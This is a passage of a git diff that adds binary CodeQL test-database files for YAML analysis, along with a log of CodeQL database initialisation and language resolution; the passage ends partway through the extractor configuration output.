diff --git a/ql/src/test-db/db-yaml/default/strings/0/metadata/page-000000 b/ql/src/test-db/db-yaml/default/strings/0/metadata/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..7aad0b066d21be9fbf80795d56e0b61634049eb0 GIT binary patch literal 8192 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 z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ 
zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 
z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ 
z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009F3 HW`Vx|E&&!+ literal 0 HcmV?d00001 
diff --git a/ql/src/test-db/db-yaml/default/yaml.rel b/ql/src/test-db/db-yaml/default/yaml.rel new file mode 100644 index 0000000000000000000000000000000000000000..529b4a834dece968ff95f48071bca09a7a2963c7 GIT binary patch literal 7992 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 Q!LfNS=X`hY=Dm*lKmT;wC;$Ke literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/yaml.rel.checksum b/ql/src/test-db/db-yaml/default/yaml.rel.checksum new file mode 100644 index 0000000000000000000000000000000000000000..a3783e268b8d3866cb97455ff14cd484ab0b8d47 GIT binary patch literal 12 ScmZQzU|?hbf)7vo?g9V^eFH)O literal 0 HcmV?d00001 
diff --git a/ql/src/test-db/db-yaml/default/yaml_locations.rel b/ql/src/test-db/db-yaml/default/yaml_locations.rel new file mode 100644 index 0000000000000000000000000000000000000000..014f03a3a638a16c87b040ee21668cc0ff098479 GIT binary patch literal 2664 zcmWN~QxqLW06@VPHFg@?wr$&uZQHhO+iqhtb{gBZt;IqCk8QzLo8wwp9CbN28l>a5~`DwWF#jADM>|Y(vX&Pq^BAg$V)~t zk(n%HB^%kvLk@D1i`?X+H2En&K?+frA{3<<#VJ8aN>PTYl%*WysX#?4QJE^#;taK^ zLtW}op9VDKG>vFX6V}s|W;CY-Eont-I?#r;w4*&8=|pGN(S?C@r5oMpK~H+on*sEp zFa7AxAjUJ8Aq-_0!x_OyMlqT(jAa}XSj$8vF_|e$Wg63&!Axc`n>oy79`jkl0v57} z#Vlbd%UI3|R3D%ZGf9Yt?&lUv;84tKd{KeFEE2M>72BOddFr#$01 zFL=o-zVn(lyyYG5`M^g$@tH4tfTJ9w~`W0uqvfL?k8&$w^8wQjwZ83?VJ)NY7w0kdaJeCJR}~Ms{+L zlUxiUHzmkJUhLRG5MnHtpOFKSVn zI@F~e^=Uvu8qt_0G^G>GXif`S(u&r!p)KubPX{{Eg@JUX8{O$aPkPatKJ=v@{TaY; z_A!EyjAArn7|S^JGM))cWDk>=%oL_Fjp@u_H#6D9EM_x@xy)le3s}e^7PEwnEM*zX zS;0zHv6?lkWgY9;z-D%_g}?cSt!!gEJJ`woKpQFW z4CnZdvs~m7m%W=&uW*%X)*19VH@L|yZgYpb+~YnEc<6k3eZ+en^Mt27<2f&Q$va;0 znm4@VgZn}BBcJ%p7rye1@BH8=zxeHZ07K9O1S2>h_=AvyA~azLOE|(4frvyRGVzH* zRHE@G(TPD!ViB7-#3ddHNk<|QlZ2!sBRMHZNh(s4hO}g16P^DMC?7QH>rj>?p$0u`x571~ghYE-8NHTjEL)TRz~sYh$- z(}0FFqA^WqN;8_%f|j(RE&XUmdpgjOPIRUVJ?Tm}y3>PR^rjDe>CXrTFpxnEW(Y$W w#&AY6hOw+*9OIe5L?$trDNJP=)0x3cW-*&NEN3pun8$n;u#iP8W(iCG2Txl!IsgCw literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/yaml_locations.rel.checksum b/ql/src/test-db/db-yaml/default/yaml_locations.rel.checksum new file mode 100644 index 0000000000000000000000000000000000000000..bb0c636593a1f0c3ca10cb8d7337d3771bfd6e82 GIT binary patch literal 12 RcmZQzU|?hb0!AH1O#lGM09gP4 literal 0 HcmV?d00001 
diff --git a/ql/src/test-db/db-yaml/default/yaml_scalars.rel b/ql/src/test-db/db-yaml/default/yaml_scalars.rel new file mode 100644 index 0000000000000000000000000000000000000000..e045b05d47e291009889305846e60f9c1b64b7a1 GIT binary patch literal 3048 zcmYk;d+gU!9LMp`Ihb3h7)ta-E@7^r%cv}Vt`(U}X-P|JmYB2<=1#dKA++Cq%YDY? z&deWXjm>6;G50a|xy-CJb9p^K-{)`h-pFGyeq5^N-Q{q@Sc&%W;}#9j`~GKUp)+WX&3<>I2iCmUd;@L1{D6C~}+G zs=LNnntaaFqtnmT?MOIg}Y8tY- zPVEg8dSd$fHS;{6*`J4WCw;HxxqX^_ zTc_E#N79(PC+)E`>V&i>(ilH6?U^)+J$$xR(~$Y|n#^C+Q_{bz+2>dFsp((S?A_~{ z{NK<#?@i6QSg$!JZ|Q02-_x9v_cdqvL(Mt)SWi#?sbGM z|ES6NXWdEvtLFE=>lx|)(B%AQ8guugZAhcYd1D&ml|PrRnkHwzRR541%BK3< zcni(%x6;Y24AA_Zj5xb<;+-7N87o6{zE_1TsQk9@p47mYvrY|)M|9Z?jybPXaxUCw zD)SZYFqNFkAze0^yBwx@?%{e^%$`xnzl`gWZ(%t~=MEO`0M&`foyxk(q%OIGg&Zm7 zKdDQ;m*o^qKAcM`dsH}!6wl&3QF*6wW|!?eXX`w_u$L6`%SliM&TR9cu&00@w`)6)OZqRH(uO>SRkp8J*NE_|)Y^E*v$Kj`7{Pr4KTqPYvd zY3>5w8H)KgblKj8jhcM^(q#U(=2`#hkxf%K(V3@irpL#d>&#QP)VT{aziTV=)a2M! z_PTDTJ8|-AE6=Sv=-lJl|No-wbxn@_dtH-VTiNTHjN0++bi!XDU_m^pJIr^l9-(s=>S&#{)NwjvHS2CG>#7r4HGJP{-m|SS@v(Yr z+@mjwv+lOCzjd-EtEoEsTTj=l{|tReeAfSdKV6gUIl2?i(qubZ&xq$}vYi`~OV(BA zIZn3o9Vgp`j Initializing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. 
+[2024-02-03 10:17:51] Running plumbing command: codeql database init --language=yaml --extractor-options-verbosity=1 --qlconfig-file=/Users/pwntester/seclab/projects/actions/codeql-actions/qlconfig.yml --source-root=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test --allow-missing-source-root=false --allow-already-existing -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db +[2024-02-03 10:17:51] Calling plumbing command: codeql resolve languages --extractor-options-verbosity=1 --format=betterjson +[2024-02-03 10:17:51] [DETAILS] resolve languages> Scanning for [codeql-extractor.yml] from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/.codeqlmanifest.json +[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go/codeql-extractor.yml. +[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python/codeql-extractor.yml. +[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java/codeql-extractor.yml. +[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html/codeql-extractor.yml. +[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp/codeql-extractor.yml. 
+[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby/codeql-extractor.yml. +[2024-02-03 10:17:52] Plumbing command codeql resolve languages completed: + { + "aliases" : { + "c" : "cpp", + "c++" : "cpp", + "c-c++" : "cpp", + "c-cpp" : "cpp", + "c#" : "csharp", + "java-kotlin" : "java", + "kotlin" : "java", + "javascript-typescript" : "javascript", + "typescript" : "javascript" + }, + "extractors" : { + "go" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go" + } + ], + "python" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python", + "extractor_options" : { + "logging" : { + "title" : "Options pertaining to logging.", + "description" : "Options pertaining to logging.", + "type" : "object", + "properties" : { + "verbosity" : { + "title" : "Python extractor logging verbosity level.", + "description" : "Controls the level of verbosity of the CodeQL Python extractor.\nThe supported levels are (in order of increasing verbosity):\n\n - off\n - errors\n - warnings\n - 
info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", + "type" : "string", + "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" + } + } + } + } + } + ], + "java" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java", + "extractor_options" : { + "exclude" : { + "title" : "A glob excluding files from analysis.", + "description" : "A glob indicating what files to exclude from the analysis.\n", + "type" : "string" + }, + "add_prefer_source" : { + "title" : "Whether to always prefer source files over class files.", + "description" : "A value indicating whether source files should be preferred over class files. If set to 'true', the extraction adds '-Xprefer:source' to the javac command line. If set to 'false', the extraction uses the default javac behavior ('-Xprefer:newer'). The default is 'true'.\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "buildless" : { + "title" : "Whether to use buildless (standalone) extraction (experimental).", + "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. 
Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "html" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html" + } + ], + "xml" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml" + } + ], + "properties" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties" + } + ], + "cpp" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp", + "extractor_options" : { } + } + ], + "swift" 